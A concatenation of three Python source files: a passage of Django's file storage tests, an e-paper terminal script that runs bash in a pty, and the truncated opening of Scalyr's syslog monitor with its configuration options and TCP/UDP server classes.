self.assertEqual(defaults_storage.file_permissions_mode, settings['FILE_UPLOAD_PERMISSIONS'])
self.assertEqual(
defaults_storage.directory_permissions_mode, settings['FILE_UPLOAD_DIRECTORY_PERMISSIONS']
)
class CustomStorage(FileSystemStorage):
def get_available_name(self, name, max_length=None):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
basename, *ext = name.split('.')
number = 2
while self.exists(name):
name = '.'.join([basename, str(number)] + ext)
number += 1
return name
class CustomStorageTests(FileStorageTests):
storage_class = CustomStorage
def test_custom_get_available_name(self):
first = self.storage.save('custom_storage', ContentFile('custom contents'))
self.assertEqual(first, 'custom_storage')
second = self.storage.save('custom_storage', ContentFile('more contents'))
self.assertEqual(second, 'custom_storage.2')
self.storage.delete(first)
self.storage.delete(second)
class OverwritingStorage(FileSystemStorage):
"""
Overwrite existing files instead of appending a suffix to generate an
unused name.
"""
# Mask out O_EXCL so os.open() doesn't raise OSError if the file exists.
OS_OPEN_FLAGS = FileSystemStorage.OS_OPEN_FLAGS & ~os.O_EXCL
def get_available_name(self, name, max_length=None):
"""Override the effort to find an used name."""
return name
class OverwritingStorageTests(FileStorageTests):
storage_class = OverwritingStorage
def test_save_overwrite_behavior(self):
"""Saving to same file name twice overwrites the first file."""
name = 'test.file'
self.assertFalse(self.storage.exists(name))
content_1 = b'content one'
content_2 = b'second content'
f_1 = ContentFile(content_1)
f_2 = ContentFile(content_2)
stored_name_1 = self.storage.save(name, f_1)
try:
self.assertEqual(stored_name_1, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_1)
stored_name_2 = self.storage.save(name, f_2)
self.assertEqual(stored_name_2, name)
self.assertTrue(self.storage.exists(name))
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, name)))
with self.storage.open(name) as fp:
self.assertEqual(fp.read(), content_2)
finally:
self.storage.delete(name)
class DiscardingFalseContentStorage(FileSystemStorage):
def _save(self, name, content):
if content:
return super()._save(name, content)
return ''
class DiscardingFalseContentStorageTests(FileStorageTests):
storage_class = DiscardingFalseContentStorage
def test_custom_storage_discarding_empty_content(self):
"""
When Storage.save() wraps a file-like object in File, it should include
the name argument so that bool(file) evaluates to True (#26495).
"""
output = StringIO('content')
self.storage.save('tests/stringio', output)
self.assertTrue(self.storage.exists('tests/stringio'))
with self.storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
class FileFieldStorageTests(TestCase):
def tearDown(self):
shutil.rmtree(temp_storage_location)
def _storage_max_filename_length(self, storage):
"""
Query filesystem for maximum filename length (e.g. AUFS has 242).
"""
dir_to_test = storage.location
while not os.path.exists(dir_to_test):
dir_to_test = os.path.dirname(dir_to_test)
try:
return os.pathconf(dir_to_test, 'PC_NAME_MAX')
except Exception:
return 255 # Should be safe on most backends
def test_files(self):
self.assertIsInstance(Storage.normal, FileDescriptor)
# An object without a file has limited functionality.
obj1 = Storage()
self.assertEqual(obj1.normal.name, "")
with self.assertRaises(ValueError):
obj1.normal.size
# Saving a file enables full functionality.
obj1.normal.save("django_test.txt", ContentFile("content"))
self.assertEqual(obj1.normal.name, "tests/django_test.txt")
self.assertEqual(obj1.normal.size, 7)
self.assertEqual(obj1.normal.read(), b"content")
obj1.normal.close()
# File objects can be assigned to FileField attributes, but shouldn't
# get committed until the model it's attached to is saved.
obj1.normal = SimpleUploadedFile("assignment.txt", b"content")
dirs, files = temp_storage.listdir("tests")
self.assertEqual(dirs, [])
self.assertNotIn("assignment.txt", files)
obj1.save()
dirs, files = temp_storage.listdir("tests")
self.assertEqual(sorted(files), ["assignment.txt", "django_test.txt"])
# Save another file with the same name.
obj2 = Storage()
obj2.normal.save("django_test.txt", ContentFile("more content"))
obj2_name = obj2.normal.name
self.assertRegex(obj2_name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
self.assertEqual(obj2.normal.size, 12)
obj2.normal.close()
# Deleting an object does not delete the file it uses.
obj2.delete()
obj2.normal.save("django_test.txt", ContentFile("more content"))
self.assertNotEqual(obj2_name, obj2.normal.name)
self.assertRegex(obj2.normal.name, "tests/django_test_%s.txt" % FILE_SUFFIX_REGEX)
obj2.normal.close()
def test_filefield_read(self):
# Files can be read in a little at a time, if necessary.
obj = Storage.objects.create(
normal=SimpleUploadedFile("assignment.txt", b"content"))
obj.normal.open()
self.assertEqual(obj.normal.read(3), b"con")
self.assertEqual(obj.normal.read(), b"tent")
self.assertEqual(list(obj.normal.chunks(chunk_size=2)), [b"co", b"nt", b"en", b"t"])
obj.normal.close()
def test_filefield_write(self):
# Files can be written to.
obj = Storage.objects.create(normal=SimpleUploadedFile('rewritten.txt', b'content'))
with obj.normal as normal:
normal.open('wb')
normal.write(b'updated')
obj.refresh_from_db()
self.assertEqual(obj.normal.read(), b'updated')
obj.normal.close()
def test_filefield_reopen(self):
obj = Storage.objects.create(normal=SimpleUploadedFile('reopen.txt', b'content'))
with obj.normal as normal:
normal.open()
obj.normal.open()
obj.normal.file.seek(0)
obj.normal.close()
def test_duplicate_filename(self):
# Multiple files with the same name get _(7 random chars) appended to them.
objs = [Storage() for i in range(2)]
for o in objs:
o.normal.save("multiple_files.txt", ContentFile("Same Content"))
try:
names = [o.normal.name for o in objs]
self.assertEqual(names[0], "tests/multiple_files.txt")
self.assertRegex(names[1], "tests/multiple_files_%s.txt" % FILE_SUFFIX_REGEX)
finally:
for o in objs:
o.delete()
def test_file_truncation(self):
# Given the max_length is limited, when multiple files get uploaded
# under the same name, then the filename get truncated in order to fit
# in _(7 random chars). When most of the max_length is taken by
# dirname + extension and there are not enough characters in the
# filename to truncate, an exception should be raised.
objs = [Storage() for i in range(2)]
filename = 'filename.ext'
for o in objs:
o.limited_length.save(filename, ContentFile('Same Content'))
try:
# Testing truncation.
names = [o.limited_length.name for o in objs]
self.assertEqual(names[0], 'tests/%s' % filename)
self.assertRegex(names[1], 'tests/fi_%s.ext' % FILE_SUFFIX_REGEX)
# Testing exception is raised when filename is too short to truncate.
filename = 'short.longext'
objs[0].limited_length.save(filename, ContentFile('Same Content'))
with self.assertRaisesMessage(SuspiciousFileOperation, 'Storage can not find an available filename'):
objs[1].limited_length.save(*(filename, ContentFile('Same Content')))
finally:
for o in objs:
o.delete()
@unittest.skipIf(
sys.platform.startswith('win'),
"Windows supports at most 260 characters in a path.",
)
def test_extended_length_storage(self):
# Testing FileField with max_length > 255. Most systems have filename
# length limitation of 255. Path takes extra chars.
filename = (self._storage_max_filename_length(temp_storage) - 4) * 'a' # 4 chars for extension.
obj = Storage()
obj.extended_length.save('%s.txt' % filename, ContentFile('Same Content'))
self.assertEqual(obj.extended_length.name, 'tests/%s.txt' % filename)
self.assertEqual(obj.extended_length.read(), b'Same Content')
obj.extended_length.close()
def test_filefield_default(self):
# Default values allow an object to access a single file.
temp_storage.save('tests/default.txt', ContentFile('default content'))
obj = Storage.objects.create()
self.assertEqual(obj.default.name, "tests/default.txt")
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
# But it shouldn't be deleted, even if there are no more objects using
# it.
obj.delete()
obj = Storage()
self.assertEqual(obj.default.read(), b"default content")
obj.default.close()
def test_empty_upload_to(self):
# upload_to can be empty, meaning it does not use subdirectory.
obj = Storage()
obj.empty.save('django_test.txt', ContentFile('more content'))
self.assertEqual(obj.empty.name, "django_test.txt")
self.assertEqual(obj.empty.read(), b"more content")
obj.empty.close()
def test_pathlib_upload_to(self):
obj = Storage()
obj.pathlib_callable.save('some_file1.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_callable.name, 'bar/some_file1.txt')
obj.pathlib_direct.save('some_file2.txt', ContentFile('some content'))
self.assertEqual(obj.pathlib_direct.name, 'bar/some_file2.txt')
obj.random.close()
def test_random_upload_to(self):
# Verify the fix for #5655, making sure the directory is only
# determined once.
obj = Storage()
obj.random.save("random_file", ContentFile("random content"))
self.assertTrue(obj.random.name.endswith("/random_file"))
obj.random.close()
def test_custom_valid_name_callable_upload_to(self):
"""
Storage.get_valid_name() should be called when upload_to is a callable.
"""
obj = Storage()
obj.custom_valid_name.save("random_file", ContentFile("random content"))
# CustomValidNameStorage.get_valid_name() appends '_valid' to the name
self.assertTrue(obj.custom_valid_name.name.endswith("/random_file_valid"))
obj.custom_valid_name.close()
def test_filefield_pickling(self):
# Push an object into the cache to make sure it pickles properly
obj = Storage()
obj.normal.save("django_test.txt", ContentFile("more content"))
obj.normal.close()
cache.set("obj", obj)
self.assertEqual(cache.get("obj").normal.name, "tests/django_test.txt")
def test_file_object(self):
# Create sample file
temp_storage.save('tests/example.txt', ContentFile('some content'))
# Load it as Python file object
with open(temp_storage.path('tests/example.txt')) as file_obj:
# Save it using storage and read its content
temp_storage.save('tests/file_obj', file_obj)
self.assertTrue(temp_storage.exists('tests/file_obj'))
with temp_storage.open('tests/file_obj') as f:
self.assertEqual(f.read(), b'some content')
def test_stringio(self):
# Test passing StringIO instance as content argument to save
output = StringIO()
output.write('content')
output.seek(0)
# Save it and read written file
temp_storage.save('tests/stringio', output)
self.assertTrue(temp_storage.exists('tests/stringio'))
with temp_storage.open('tests/stringio') as f:
self.assertEqual(f.read(), b'content')
# Tests for a race condition on file saving (#4948).
# This is written in such a way that it'll always pass on platforms
# without threading.
class SlowFile(ContentFile):
def chunks(self):
time.sleep(1)
return super().chunks()
class FileSaveRaceConditionTest(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
self.thread = threading.Thread(target=self.save_file, args=['conflict'])
def tearDown(self):
shutil.rmtree(self.storage_dir)
def save_file(self, name):
name = self.storage.save(name, SlowFile(b"Data"))
def test_race_condition(self):
self.thread.start()
self.save_file('conflict')
self.thread.join()
files = sorted(os.listdir(self.storage_dir))
self.assertEqual(files[0], 'conflict')
self.assertRegex(files[1], 'conflict_%s' % FILE_SUFFIX_REGEX)
@unittest.skipIf(sys.platform.startswith('win'), "Windows only partially supports umasks and chmod.")
class FileStoragePermissions(unittest.TestCase):
def setUp(self):
self.umask = 0o027
self.old_umask = os.umask(self.umask)
self.storage_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.storage_dir)
os.umask(self.old_umask)
@override_settings(FILE_UPLOAD_PERMISSIONS=0o654)
def test_file_upload_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_file", ContentFile("data"))
actual_mode = os.stat(self.storage.path(name))[0] & 0o777
self.assertEqual(actual_mode, 0o654)
@override_settings(FILE_UPLOAD_PERMISSIONS=None)
def test_file_upload_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
fname = self.storage.save("some_file", ContentFile("data"))
mode = os.stat(self.storage.path(fname))[0] & 0o777
self.assertEqual(mode, 0o666 & ~self.umask)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=0o765)
def test_file_upload_directory_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o765)
@override_settings(FILE_UPLOAD_DIRECTORY_PERMISSIONS=None)
def test_file_upload_directory_default_permissions(self):
self.storage = FileSystemStorage(self.storage_dir)
name = self.storage.save("the_directory/the_file", ContentFile("data"))
dir_mode = os.stat(os.path.dirname(self.storage.path(name)))[0] & 0o777
self.assertEqual(dir_mode, 0o777 & ~self.umask)
class FileStoragePathParsing(SimpleTestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_directory_with_dot(self):
"""Regression test for #9610.
If the directory name contains a dot and the file name doesn't, make
sure we still mangle the file name instead of the directory name.
"""
self.storage.save('dotted.path/test', ContentFile("1"))
self.storage.save('dotted.path/test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], 'test')
self.assertRegex(files[1], 'test_%s' % FILE_SUFFIX_REGEX)
def test_first_character_dot(self):
"""
File names with a dot as their first character don't have an extension,
and the underscore should get added to the end.
"""
self.storage.save('dotted.path/.test', ContentFile("1"))
self.storage.save('dotted.path/.test', ContentFile("2"))
files = sorted(os.listdir(os.path.join(self.storage_dir, 'dotted.path')))
self.assertFalse(os.path.exists(os.path.join(self.storage_dir, 'dotted_.path')))
self.assertEqual(files[0], '.test')
self.assertRegex(files[1], '.test_%s' % FILE_SUFFIX_REGEX)
class ContentFileStorageTestCase(unittest.TestCase):
def setUp(self):
self.storage_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(self.storage_dir)
def tearDown(self):
shutil.rmtree(self.storage_dir)
def test_content_saving(self):
"""
ContentFile can be saved correctly with the filesystem storage,
if it was initialized with either bytes or unicode content.
"""
self.storage.save('bytes.txt', ContentFile(b"content"))
self.storage.save('unicode.txt', ContentFile("español"))
@override_settings(ROOT_URLCONF='file_storage.urls')
class FileLikeObjectTestCase(LiveServerTestCase):
"""
Test file-like objects (#15644).
"""
available_apps = []
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = FileSystemStorage(location=self.temp_dir)
def tearDown(self):
shutil.rmtree(self.temp_dir)
def test_urllib_request_urlopen(self):
"""
Test the File storage API with a file-like object coming from
urllib.request.urlopen().
"""
file_like_object = urlopen(self.live_server_url + '/')
f = File(file_like_object)
stored_filename = self.storage.save("remote_file.html", f)
remote_file = urlopen(self.live_server_url + '/')
with self.storage.open(stored_filename) as stored_file:
self.assertEqual(stored_file.read(), remote_file.read())
|
keyboard.py | import os
import pty
import pyte
from threading import Thread
from epaper import EPaper
import time
from key_events import ExclusiveKeyReader
from keys import KeyHandler
screen = pyte.Screen(34, 18)
stream = pyte.Stream()
stream.attach(screen)
os.environ["COLUMNS"] = "34"
os.environ["LINES"] = "18"
paper = EPaper("/dev/ttyS0", debug=False)
child_pid, fd = pty.fork()
if child_pid == 0:
os.execlp("/bin/bash", "PaperTerminal", "-i")
else:
def read_bash():
while True:
try:
out = os.read(fd, 4096)
stream.feed(out.decode("utf-8"))
except OSError:
break
bash_thread = Thread(target=read_bash)
bash_thread.daemon = True
bash_thread.start()
def displayer():
prev_screen = ""
prev_x, prev_y = 100, 100 # impossible!
while True:
s = screen.display
if (("\n".join(s) != prev_screen) or
(prev_x != screen.cursor.x) or
(prev_y != screen.cursor.y)):
paper.cls()
paper.draw_screen(s)
paper.draw_cursor(screen.cursor.y, screen.cursor.x)
paper.finalize()
prev_screen = "\n".join(s)
prev_x, prev_y = screen.cursor.x, screen.cursor.y
time.sleep(2)
display_thread = Thread(target=displayer)
display_thread.daemon = True
display_thread.start()
def feed_fn(asc):
os.write(fd, bytes(chr(asc), "utf-8"))
with ExclusiveKeyReader("/dev/input/event1") as key_reader:
key_handler = KeyHandler(key_reader, feed_fn)
key_handler.run()
|
syslog_monitor.py | # Copyright 2014 Scalyr Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
# author: Imron Alston <imron@scalyr.com>
__author__ = 'imron@scalyr.com'
import errno
import glob
import logging
import logging.handlers
import os
import os.path
import re
from socket import error as socket_error
import socket
import struct
import SocketServer
import threading
import time
import traceback
from string import Template
from threading import Timer
from scalyr_agent import ScalyrMonitor, define_config_option, AutoFlushingRotatingFileHandler
from scalyr_agent.log_watcher import LogWatcher
from scalyr_agent.scalyr_logging import DEBUG_LEVEL_0, DEBUG_LEVEL_1, DEBUG_LEVEL_2
from scalyr_agent.scalyr_logging import DEBUG_LEVEL_3, DEBUG_LEVEL_4, DEBUG_LEVEL_5
from scalyr_agent.monitor_utils.server_processors import RequestSizeExceeded
from scalyr_agent.monitor_utils.server_processors import RequestStream
from scalyr_agent.monitor_utils.auto_flushing_rotating_file import AutoFlushingRotatingFile
from scalyr_agent.util import StoppableThread
from scalyr_agent.json_lib import JsonObject
import scalyr_agent.scalyr_logging as scalyr_logging
global_log = scalyr_logging.getLogger(__name__)
__monitor__ = __name__
RUN_EXPIRE_COUNT = 100
define_config_option(__monitor__, 'module',
'Always ``scalyr_agent.builtin_monitors.syslog_monitor``',
convert_to=str, required_option=True)
define_config_option( __monitor__, 'protocols',
'Optional (defaults to ``tcp:601``). Lists the protocols and ports on which the agent will accept '
'messages. You can include one or more entries, separated by commas. Each entry must be of the '
'form ``tcp:NNN`` or ``udp:NNN``. Port numbers are optional, defaulting to 601 for TCP and 514 '
'for UDP',
convert_to=str, default='tcp')
define_config_option(__monitor__, 'accept_remote_connections',
'Optional (defaults to false). If true, the plugin will accept network connections from any host; '
'otherwise, it will only accept connections from localhost.',
default=False, convert_to=bool)
define_config_option( __monitor__, 'message_log',
'Optional (defaults to ``agent_syslog.log``). Specifies the file name under which syslog messages '
'are stored. The file will be placed in the default Scalyr log directory, unless it is an '
'absolute path',
convert_to=str, default='agent_syslog.log')
define_config_option( __monitor__, 'parser',
'Optional (defaults to ``agentSyslog``). Defines the parser name associated with the log file',
convert_to=str, default='agentSyslog')
define_config_option( __monitor__, 'tcp_buffer_size',
'Optional (defaults to 8K). The maximum buffer size for a single TCP syslog message. '
'Note: RFC 5425 (syslog over TCP/TLS) says syslog receivers MUST be able to support messages at least 2048 bytes long, and recommends they SHOULD '
'support messages up to 8192 bytes long.',
default=8192, min_value=2048, max_value=65536*1024, convert_to=int)
define_config_option( __monitor__, 'max_log_size',
'Optional (defaults to None). How large the log file will grow before it is rotated. If None, then the '
'default value will be taken from the monitor level or the global level log_rotation_max_bytes config option. Set to zero '
'for infinite size. Note that rotation is not visible in Scalyr; it is only relevant for managing '
'disk space on the host running the agent. However, a very small limit could cause logs to be '
'dropped if there is a temporary network outage and the log overflows before it can be sent to '
'Scalyr',
convert_to=int, default=None)
define_config_option( __monitor__, 'max_log_rotations',
'Optional (defaults to None). The maximum number of log rotations before older log files are '
'deleted. If None, then the value is taken from the monitor level or the global level log_rotation_backup_count option. '
'Set to zero for infinite rotations.',
convert_to=int, default=None)
define_config_option( __monitor__, 'log_flush_delay',
'Optional (defaults to 1.0). The time to wait in seconds between flushing the log file containing '
'the syslog messages.',
convert_to=float, default=1.0)
define_config_option(__monitor__, 'mode',
'Optional (defaults to "syslog"). If set to "docker", the plugin will enable extra functionality '
'to properly receive log lines sent via the `docker_monitor`. In particular, the plugin will '
'check for container ids in the tags of the incoming lines and create log files based on their '
'container names.',
default='syslog', convert_to=str)
define_config_option( __monitor__, 'docker_regex',
'Regular expression for parsing out docker logs from a syslog message when the tag sent to syslog '
'only has the container id. If a message matches this regex then everything *after* '
'the full matching expression will be logged to a file called docker-<container-name>.log',
convert_to=str, default='^.*([a-z0-9]{12})\[\d+\]: ?')
define_config_option( __monitor__, 'docker_regex_full',
'Regular expression for parsing out docker logs from a syslog message when the tag sent to syslog '
'included both the container name and id. If a message matches this regex then everything *after* '
'the full matching expression will be logged to a file called docker-<container-name>.log',
convert_to=str, default='^.*([^/]+)/([^[]+)\[\d+\]: ?')
define_config_option( __monitor__, 'docker_expire_log',
'Optional (defaults to 300). The number of seconds of inactivity from a specific container before '
'the log file is removed. The log will be created again if a new message comes in from the container',
default=300, convert_to=int)
define_config_option( __monitor__, 'docker_accept_ips',
'Optional. A list of ip addresses to accept connections from if being run in a docker container. '
'Defaults to a list with the ip address of the default docker bridge gateway. '
'If accept_remote_connections is true, this option does nothing.')
define_config_option(__monitor__, 'docker_api_socket',
'Optional (defaults to /var/scalyr/docker.sock). Defines the unix socket used to communicate with '
'the docker API. This is only used when `mode` is set to `docker` to look up container '
'names by their ids. WARNING, you must also set the `api_socket` configuration option in the '
'docker monitor to this same value.\n'
'Note: You need to map the host\'s /run/docker.sock to the same value as specified here, using '
'the -v parameter, e.g.\n'
'\tdocker run -v /run/docker.sock:/var/scalyr/docker.sock ...',
convert_to=str, default='/var/scalyr/docker.sock')
define_config_option(__monitor__, 'docker_api_version',
'Optional (defaults to \'auto\'). The version of the Docker API to use when communicating to '
'docker. WARNING, you must also set the `docker_api_version` configuration option in the docker '
'monitor to this same value.', convert_to=str, default='auto')
define_config_option(__monitor__, 'docker_logfile_template',
'Optional (defaults to \'containers/${CNAME}.log\'). The template used to create the log '
'file paths for save docker logs sent by other containers via syslog. The variables $CNAME and '
'$CID will be substituted with the name and id of the container that is emitting the logs. If '
'the path is not absolute, then it is assumed to be relative to the main Scalyr Agent log '
'directory.', convert_to=str, default='containers/${CNAME}.log')
define_config_option(__monitor__, 'docker_cid_cache_lifetime_secs',
'Optional (defaults to 300). Controls the docker id to container name cache expiration. After '
'this number of seconds of inactivity, the cache entry will be evicted.',
convert_to=float, default=300.0)
define_config_option(__monitor__, 'docker_cid_clean_time_secs',
'Optional (defaults to 5.0). The number seconds to wait between cleaning the docker id to '
'container name cache.',
convert_to=float, default=5.0)
define_config_option(__monitor__, 'docker_use_daemon_to_resolve',
'Optional (defaults to True). If True, will use the Docker daemon (via the docker_api_socket to '
'resolve container ids to container names. If you set this to False, you must be sure to add the '
'--log-opt tag="/{{.Name}}/{{.ID}}" to your running containers to pass the container name in the '
'log messages.',
convert_to=bool, default=True)
define_config_option(__monitor__, 'docker_check_for_unused_logs_mins',
'Optional (defaults to 60). The number of minutes to wait between checking to see if there are any '
'log files matchings the docker_logfile_template that haven\'t been written to for a while and can '
'be deleted',
convert_to=int, default=60)
define_config_option(__monitor__, 'docker_delete_unused_logs_hours',
'Optional (defaults to 24). The number of hours to wait before deleting any '
'log files matchings the docker_logfile_template',
convert_to=int, default=24)
define_config_option(__monitor__, 'docker_check_rotated_timestamps',
'Optional (defaults to True). If True, will check timestamps of all file rotations to see if they '
'should be individually deleted based on the the log deletion configuration options. '
'If False, only the file modification time of the main log file is checked, and the rotated files '
'will only be deleted when the main log file is deleted.',
convert_to=bool, default=True)
def _get_default_gateway():
"""Read the default gateway directly from /proc."""
result = 'localhost'
fh = None
try:
fh = open("/proc/net/route")
for line in fh:
fields = line.strip().split()
if fields[1] != '00000000' or not int(fields[3], 16) & 2:
continue
result = socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
except IOError, e:
global_log.error('Error while getting the default gateway: %s', str(e), limit_once_per_x_secs=300,
limit_key='_get_default_gateway_error')
finally:
if fh:
fh.close()
return result
class SyslogFrameParser(object):
"""Simple abstraction that implements a 'parse_request' that can be used to parse incoming syslog
messages. These will either be terminated by a newline (or crlf) sequence, or begin with an
integer specifying the number of octects in the message. The parser performs detection of
which type the message is and handles it appropriately.
"""
def __init__(self, max_request_size):
"""Creates a new instance.
@param max_request_size: The maximum number of bytes that can be contained in an individual request.
"""
self.__max_request_size = max_request_size
def parse_request(self, input_buffer, _):
"""Returns the next complete request from 'input_buffer'.
If the message is framed, then if the number of bytes in the buffer is >= the number of bytes in
the frame, then return the entire frame, otherwise return None and no bytes are consumed.
If the message is unframed, then if there is a complete line at the start of 'input_buffer' (where complete line is determined by it
ending in a newline character), then consumes those bytes from 'input_buffer' and returns the string
including the newline. Otherwise None is returned and no bytes are consumed from 'input_buffer'
@param input_buffer: The bytes to read.
@param _: The number of bytes available in 'input_buffer'. (not used)
@return: A string containing the next complete request read from 'input_buffer' or None if there is none.
RequestSizeExceeded if a line is found to exceed the maximum request size.
ValueError if the message starts with a digit (e.g. is framed) but the frame size is not delimited by a space
"""
new_position = None
try:
new_position = input_buffer.tell()
buf = input_buffer.read( self.__max_request_size + 1)
bytes_received = len(buf)
if bytes_received > self.__max_request_size:
# We just consume these bytes if the line did exceeded the maximum. To some degree, this
# typically does not matter since once we see any error on a connection, we close it down.
global_log.warning( "SyslogFrameParser - bytes received exceed buffer size. Some logs may be lost." )
new_position = None
raise RequestSizeExceeded(bytes_received, self.__max_request_size)
framed = False
if bytes_received > 0:
c = buf[0]
framed = (c >= '0' and c <= '9')
else:
return None
#offsets contains the start and end offsets of the message within the buffer.
#an end offset of 0 indicates there is not a valid message in the buffer yet
offsets = (0, 0)
if framed:
offsets = self._framed_offsets( buf, bytes_received )
else:
offsets = self._unframed_offsets( buf, bytes_received )
if offsets[1] != 0:
#our new position is going to be the previous position plus the end offset
new_position += offsets[1]
#return a slice containing the full message
return buf[ offsets[0]:offsets[1] ]
return None
finally:
if new_position is not None:
input_buffer.seek(new_position)
def _framed_offsets( self, frame_buffer, length ):
result = (0, 0)
pos = frame_buffer.find( ' ' )
if pos != -1:
frame_size = int( frame_buffer[0:pos] )
message_offset = pos + 1
if length - message_offset >= frame_size:
result = (message_offset, message_offset + frame_size)
return result
def _unframed_offsets( self, frame_buffer, length ):
result = (0, 0)
pos = frame_buffer.find( '\n' )
if pos != -1:
result = (0, pos + 1)
return result
class SyslogUDPHandler( SocketServer.BaseRequestHandler ):
"""Class that reads data from a UDP request and passes it to
a protocol neutral handler
"""
def handle( self ):
self.server.syslog_handler.handle( self.request[0].strip() )
class SyslogRequestParser( object ):
def __init__( self, socket, max_buffer_size ):
self._socket = socket
if socket:
self._socket.setblocking( False )
self._remaining = None
self._max_buffer_size = max_buffer_size
self.is_closed = False
def read( self ):
"""Reads self._max_buffer_size bytes from the buffer"""
data = None
try:
data = self._socket.recv( self._max_buffer_size )
if not data:
self.is_closed = True
except socket.timeout:
self._socket_error = True
return None
except socket.error, e:
if e.errno == errno.EAGAIN:
return None
else:
global_log.warning('Network error while reading from syslog: %s', str(e), limit_once_per_x_secs=300,
limit_key='syslog-network-error')
self._socket_error = True
raise e
return data
def process( self, data, handle_frame ):
"""Processes data returned from a previous call to read
"""
if not data:
global_log.warning('Syslog has seen an empty request, could be an indication of missing data',
limit_once_per_x_secs=600, limit_key='syslog-empty-request')
return
# append data to what we had remaining from the previous call
if self._remaining:
self._remaining += data
else:
self._remaining = data
self._offset = 0
size = len( self._remaining )
# process the buffer until we are out of bytes
frames_handled = 0
while self._offset < size:
# get the first byte to determine if framed or not
c = self._remaining[self._offset]
framed = (c >= '0' and c <= '9')
skip = 0 # do we need to skip any bytes at the end of the frame (e.g. newlines)
#if framed, read the frame size
if framed:
frame_end = -1
pos = self._remaining.find( " ", self._offset )
if pos != -1:
frame_size = int( self._remaining[self._offset:pos] )
message_offset = pos + 1
if size - message_offset >= frame_size:
self._offset = message_offset
frame_end = self._offset + frame_size
else:
# not framed, find the first newline
frame_end = self._remaining.find( "\n", self._offset )
skip = 1
# if we couldn't find the end of a frame, then it's time
# to exit the loop and wait for more data
if frame_end == -1:
#if the remaining bytes exceed the maximum buffer size, issue a warning
#and dump existing contents to the handler
if size - self._offset >= self._max_buffer_size:
global_log.warning( "Syslog frame exceeded maximum buffer size",
limit_once_per_x_secs=300,
limit_key='syslog-max-buffer-exceeded')
handle_frame( self._remaining )
frames_handled += 1
# add a space to ensure the next frame won't start with a number
# and be incorrectly interpreted as a framed message
self._remaining = ' '
self._offset = 0
break
# output the frame
frame_length = frame_end - self._offset
handle_frame( self._remaining[self._offset:frame_end].strip() )
frames_handled += 1
self._offset += frame_length + skip
if frames_handled == 0:
global_log.info('No frames ready to be handled in syslog.. advisory notice',
limit_once_per_x_secs=600, limit_key='syslog-no-frames')
self._remaining = self._remaining[self._offset:]
self._offset = 0
class SyslogTCPHandler( SocketServer.BaseRequestHandler ):
"""Class that reads data from a TCP request and passes it to
a protocol neutral handler
"""
def handle( self ):
try:
request_stream = SyslogRequestParser( self.request, self.server.tcp_buffer_size )
global_log.log(scalyr_logging.DEBUG_LEVEL_1, "SyslogTCPHandler.handle - created request_stream. Thread: %d", threading.current_thread().ident )
count = 0
while not request_stream.is_closed:
check_running = False
data = request_stream.read()
if data is not None:
request_stream.process( data, self.server.syslog_handler.handle )
count += 1
if count > 1000:
check_running = True
count = 0
else:
# don't hog the CPU
time.sleep( 0.01 )
check_running = True
# limit the amount of times we check if the server is still running
# as this is a time consuming operation due to locking
if check_running and not self.server.is_running():
break
except Exception, e:
global_log.warning( "Error handling request: %s\n\t%s", str( e ), traceback.format_exc() )
global_log.log(scalyr_logging.DEBUG_LEVEL_1, "SyslogTCPHandler.handle - closing request_stream. Thread: %d", threading.current_thread().ident )
class SyslogUDPServer( SocketServer.ThreadingMixIn, SocketServer.UDPServer ):
"""Class that creates a UDP SocketServer on a specified port
"""
def __init__( self, port, bind_address, verifier ):
self.__verifier = verifier
address = ( bind_address, port )
global_log.log(scalyr_logging.DEBUG_LEVEL_1, "UDP Server: binding socket to %s" % str( address ) )
self.allow_reuse_address = True
SocketServer.UDPServer.__init__( self, address, SyslogUDPHandler )
def verify_request( self, request, client_address ):
return self.__verifier.verify_request( client_address )
def set_run_state( self, run_state ):
"""Do Nothing only TCP connections need the runstate"""
pass
class SyslogTCPServer( SocketServer.ThreadingMixIn, SocketServer.TCPServer ):
"""Class that creates a TCP SocketServer on a specified port
"""
def __init__( self, port, tcp_buffer_size, bind_address, verifier ):
self.__verifier = verifier
address = ( bind_address, port )
global_log.log(scalyr_logging.DEBUG_LEVEL_1, "TCP Server: binding socket to %s" % str( address ) )
self.allow_reuse_address = True
self.__run_state = None
self.tcp_buffer_size = tcp_buffer_size
SocketServer.TCPServer.__init__( self, address, SyslogTCPHandler )
def verify_request( self, request, client_address ):
return self.__verifier.verify_request( client_address )
def set_run_state( self, run_state ):
self.__run_state = run_state
def is_running( self ):
if self.__run_state:
return self.__run_state.is_running()
return False
class LogDeleter( object ):
